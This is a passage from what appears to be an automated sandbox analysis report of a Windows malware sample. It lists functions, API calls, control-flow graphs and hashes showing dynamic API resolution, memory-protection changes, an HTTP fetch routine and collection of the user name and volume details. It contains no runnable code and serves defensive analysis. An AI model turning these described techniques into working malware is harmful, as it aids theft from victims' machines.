                                      • GetProcAddress.KERNEL32(76210000,00E26878), ref: 00129D5E
                                      • GetProcAddress.KERNEL32(76210000,00E31750), ref: 00129D77
                                      • GetProcAddress.KERNEL32(76210000,00E31780), ref: 00129D8F
                                      • GetProcAddress.KERNEL32(76210000,00E26578), ref: 00129DA7
                                      • GetProcAddress.KERNEL32(76210000,00E31828), ref: 00129DC0
                                      • GetProcAddress.KERNEL32(76210000,00E264D8), ref: 00129DD8
                                      • LoadLibraryA.KERNEL32(00E31858,?,00126CA0), ref: 00129DEA
                                      • LoadLibraryA.KERNEL32(00E317F8,?,00126CA0), ref: 00129DFB
                                      • LoadLibraryA.KERNEL32(00E31870,?,00126CA0), ref: 00129E0D
                                      • LoadLibraryA.KERNEL32(00E31888,?,00126CA0), ref: 00129E1F
                                      • LoadLibraryA.KERNEL32(00E318A0,?,00126CA0), ref: 00129E30
                                      • GetProcAddress.KERNEL32(75B30000,00E318B8), ref: 00129E52
                                      • GetProcAddress.KERNEL32(751E0000,00E31810), ref: 00129E73
                                      • GetProcAddress.KERNEL32(751E0000,00E31840), ref: 00129E8B
                                      • GetProcAddress.KERNEL32(76910000,00E394C8), ref: 00129EAD
                                      • GetProcAddress.KERNEL32(75670000,00E264F8), ref: 00129ECE
                                      • GetProcAddress.KERNEL32(77310000,00E39190), ref: 00129EEF
                                      • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00129F06
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess$xe$xf$xh
                                      • API String ID: 2238633743-3466325136
                                      • Opcode ID: 0c2cb0fde46f4a7c507a437b61310ff78d50f012e8365228532c6a561c6f97af
                                      • Instruction ID: 1d928d0bcd7130c4272e01384b346f9f557e71b9e7e577e4efc100ace6eb0166
                                      • Opcode Fuzzy Hash: 0c2cb0fde46f4a7c507a437b61310ff78d50f012e8365228532c6a561c6f97af
                                      • Instruction Fuzzy Hash: C5A14CB55182809FC366DFA8FCC99567BADE75D341F108B1ABA09CB2F0D734A941CB60
                                      Function 00114610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 764 114610-1146e5 RtlAllocateHeap 781 1146f0-1146f6 764->781 782 1146fc-11479a 781->782 783 11479f-1147f9 VirtualProtect 781->783 782->781
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0011465F
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001147EC
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001147C0
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114688
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114667
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001146C8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114693
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0011471D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114763
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114712
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114638
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001146D3
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114643
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114707
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0011476E
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114784
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001147B5
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0011478F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114779
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114622
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114672
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001146A7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001146FC
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0011462D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001147CB
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001146BD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0011479F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114617
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0011467D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114728
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001147AA
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001146B2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeapProtectVirtual
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 1542196881-2218711628
                                      • Opcode ID: d5b2e99fd46db3773760923cfd6d3937d0d23b7a6b0c69e8adfb6cd7234d23f7
                                      • Instruction ID: 307cac1193e5f3ea411efd0d988fdb1eee19b69b60cb1bc9ca0a04b3a3605426
                                      • Opcode Fuzzy Hash: d5b2e99fd46db3773760923cfd6d3937d0d23b7a6b0c69e8adfb6cd7234d23f7
                                      • Instruction Fuzzy Hash: B94112607C26057EEFB8FBA68C42E9F76775F43F08F415040FA0652682CBF87509656A
                                      Function 001162D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1244 1162d0-11635b call 12aab0 call 114800 call 12aa50 InternetOpenA StrCmpCA 1251 116364-116368 1244->1251 1252 11635d 1244->1252 1253 116559-116575 call 12aab0 call 12ab10 * 2 1251->1253 1254 11636e-116392 InternetConnectA 1251->1254 1252->1251 1273 116578-11657d 1253->1273 1256 116398-11639c 1254->1256 1257 11654f-116553 InternetCloseHandle 1254->1257 1259 1163aa 1256->1259 1260 11639e-1163a8 1256->1260 1257->1253 1261 1163b4-1163e2 HttpOpenRequestA 1259->1261 1260->1261 1263 116545-116549 InternetCloseHandle 1261->1263 1264 1163e8-1163ec 1261->1264 1263->1257 1266 116415-116455 HttpSendRequestA HttpQueryInfoA 1264->1266 1267 1163ee-11640f InternetSetOptionA 1264->1267 1269 116457-116477 call 12aa50 call 12ab10 * 2 1266->1269 1270 11647c-11649b call 128ad0 1266->1270 1267->1266 1269->1273 1278 116519-116539 call 12aa50 call 12ab10 * 2 1270->1278 1279 11649d-1164a4 1270->1279 1278->1273 1282 116517-11653f InternetCloseHandle 1279->1282 1283 1164a6-1164d0 InternetReadFile 1279->1283 1282->1263 1284 1164d2-1164d9 1283->1284 1285 1164db 1283->1285 1284->1285 1289 1164dd-116515 call 12acc0 call 12abb0 call 12ab10 1284->1289 1285->1282 1289->1283
                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 00114800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00114889
                                        • Part of subcall function 00114800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00114899
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • InternetOpenA.WININET(00130DFF,00000001,00000000,00000000,00000000), ref: 00116331
                                      • StrCmpCA.SHLWAPI(?,00E3F970), ref: 00116353
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00116385
                                      • HttpOpenRequestA.WININET(00000000,GET,?,00E3F0E0,00000000,00000000,00400100,00000000), ref: 001163D5
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0011640F
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00116421
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0011644D
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001164BD
                                      • InternetCloseHandle.WININET(00000000), ref: 0011653F
                                      • InternetCloseHandle.WININET(00000000), ref: 00116549
                                      • InternetCloseHandle.WININET(00000000), ref: 00116553
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3749127164-2509457195
                                      • Opcode ID: 374f1beed2193f43b7e6d0f6a1cd21100047ab231b4f14c9e5a64432e9a608d3
                                      • Instruction ID: 80d1bf1c5675104b4f8f1439264f04133077deb46b50a173c2b0a7eb18e5bbf5
                                      • Opcode Fuzzy Hash: 374f1beed2193f43b7e6d0f6a1cd21100047ab231b4f14c9e5a64432e9a608d3
                                      • Instruction Fuzzy Hash: 48717F71A00218EBDB28DF90DC95BEE7779BF54700F1085A8F10A6B1D0DBB56A84CF51
                                      Function 00127690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1356 127690-1276da GetWindowsDirectoryA 1357 1276e3-127757 GetVolumeInformationA call 128e90 * 3 1356->1357 1358 1276dc 1356->1358 1365 127768-12776f 1357->1365 1358->1357 1366 127771-12778a call 128e90 1365->1366 1367 12778c-1277a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 1277b8-1277e8 wsprintfA call 12aa50 1367->1369 1370 1277a9-1277b6 call 12aa50 1367->1370 1377 12780e-12781e 1369->1377 1370->1377
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001276D2
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0012770F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00127793
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0012779A
                                      • wsprintfA.USER32 ref: 001277D0
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 1544550907-3809124531
                                      • Opcode ID: fe573b2c7ed48ead4579e023e3b1a576af8e043b86adf5987625c977457bcb3d
                                      • Instruction ID: b4e4de3be4c8caa854d472460f4e7577c4bc5fdec73ca028453ad814c7aa4575
                                      • Opcode Fuzzy Hash: fe573b2c7ed48ead4579e023e3b1a576af8e043b86adf5987625c977457bcb3d
                                      • Instruction Fuzzy Hash: 1141B3B1D04358EBDB11DF94EC85BDEBBB8AF18700F100199F609AB2C0D774AA54CBA5
                                      Function 001279E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001111B7), ref: 00127A10
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00127A17
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00127A2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: 1b602368f0943b89a0bd8794e31c07873d755e13ffdef095292d5cc225d0f417
                                      • Instruction ID: bbcf97a8af6c3191dbf4dfe45d3631a26bfa1df6274dfd68a95416f6b77c6482
                                      • Opcode Fuzzy Hash: 1b602368f0943b89a0bd8794e31c07873d755e13ffdef095292d5cc225d0f417
                                      • Instruction Fuzzy Hash: 1CF04FB1D48249EBC714DF98ED85BAEBBBCEB05721F10061AFA15A7680C77515008BA1
                                      Function 00111160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: a7938f5c6a29cd753cb82ba54cbbdbd2fc583ba43168fa414913d3d086bdec1c
                                      • Instruction ID: 0c41219702d2126b9d9d6e96b51e96f6c523064e74f5ae55bc83ee1f1fec6401
                                      • Opcode Fuzzy Hash: a7938f5c6a29cd753cb82ba54cbbdbd2fc583ba43168fa414913d3d086bdec1c
